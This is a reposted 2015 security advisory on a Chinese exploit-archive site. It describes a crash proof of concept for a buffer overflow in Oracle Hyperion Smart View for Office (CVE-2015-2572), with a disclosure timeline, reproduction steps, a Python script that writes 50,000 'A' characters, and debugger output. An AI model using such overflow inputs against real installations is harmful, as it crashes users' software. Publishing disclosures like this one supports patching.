首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Oracle Hyperion Smart View for Office 11.1.2.3.000 - Crash PoC
来源:1337day.com 作者:sajith 发布时间:2015-04-20  
# Exploit Title: Buffer Overflow in Oracle  Hyperion Smart View for Office
[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://oracle.com
# vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157
#Vulnerable Link:
# Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1
[x64],en-us
#plugin tested with Microsoft Excel 2010
#CVE: CVE-2015-2572
   
Responsible Disclosure:
   
Reported to Oracle on Jul 7, 2014
patch released on April 14, 2015
   
How to reproduce the bug?
   
   
1)install "Smart view" and open Microsoft excel and click on "smart view"
tab
   
2)click on "Options" and then click on "Advanced" tab
   
3) In General menu in "shared Connections URL" enter large value say 50000
"A"'s and press ok, the application crashes, the output of the crash
analyzed in debugger is shown below
   
Note:Plugin once installed automatically integrates with Microsoft office
products like,excel,Word,PowerPoint,Microsoft office.so the vulnerability
can be exploited via any of these products.
   
==================python script to create 50000 "A"'s============
   
   
try:
   
    print "POC by sajith shetty"
   
    f = open("text.txt","w")
   
    junk = "A" * 50000
   
    f.write(junk)
   
    print "done"
   
except Exception, e:
   
        print "error- " + str(e)
   
   
Debugger o/p:
   
eax=00410061 ebx=0041005d ecx=00410041 edx=00000000 esi=00410061
edi=0041005d
eip=779622d2 esp=0040b7f8 ebp=0040b80c iopl=0         nv up ei pl nz na pe
nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b
efl=00010206
ntdll!RtlEnterCriticalSection+0x12:
779622d2 f00fba3000      lock btr dword ptr [eax],0
ds:002b:00410061=????????
   
caused by MODULE_NAME: HsAddin
   
   
start    end        module name
0fb50000 111a0000   HsAddin    (export symbols)
C:\Oracle\SmartView\bin\HsAddin.dll
    Loaded symbol image file: C:\Oracle\SmartView\bin\HsAddin.dll
    Image path: C:\Oracle\SmartView\bin\HsAddin.dll
    Image name: HsAddin.dll
    Timestamp:        Wed Mar 27 04:27:50 2013 (515227EE)
    CheckSum:         0163F951
    ImageSize:        01650000
    File version:     11.1.2.3085
    Product version:  11.1.2.3085
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Oracle Corporation
    ProductName:      Oracle  Hyperion Smart View for Office, Fusion Edition
    InternalName:     CommonAddin
    ProductVersion:   11.1.2.3.000.157
    FileVersion:      11.1.2.3085
    FileDescription:  Oracle  Hyperion Smart View for Office, Fusion Edition
    LegalCopyright:   Copyright 2004, 2013 Oracle Corporation.  All rights
reserved
    LegalTrademarks:  Oracle  is registered.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link/TRENDnet NCC Service Co
·Mac OS X Local Denial Of Servi
·MS Windows (HTTP.sys) HTTP Req
·Lychee 2.7.1 Remote Code Execu
·Microsoft Window - HTTP.sys Po
·WordPress Work The Flow Upload
·Abrt / Apport Race Condition /
·WordPress Creative Contact For
·Fedora abrt Race Condition Exp
·WordPress N-Media Website Cont
·Apport/Abrt Local Root Exploit
·WordPress Reflex Gallery Uploa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved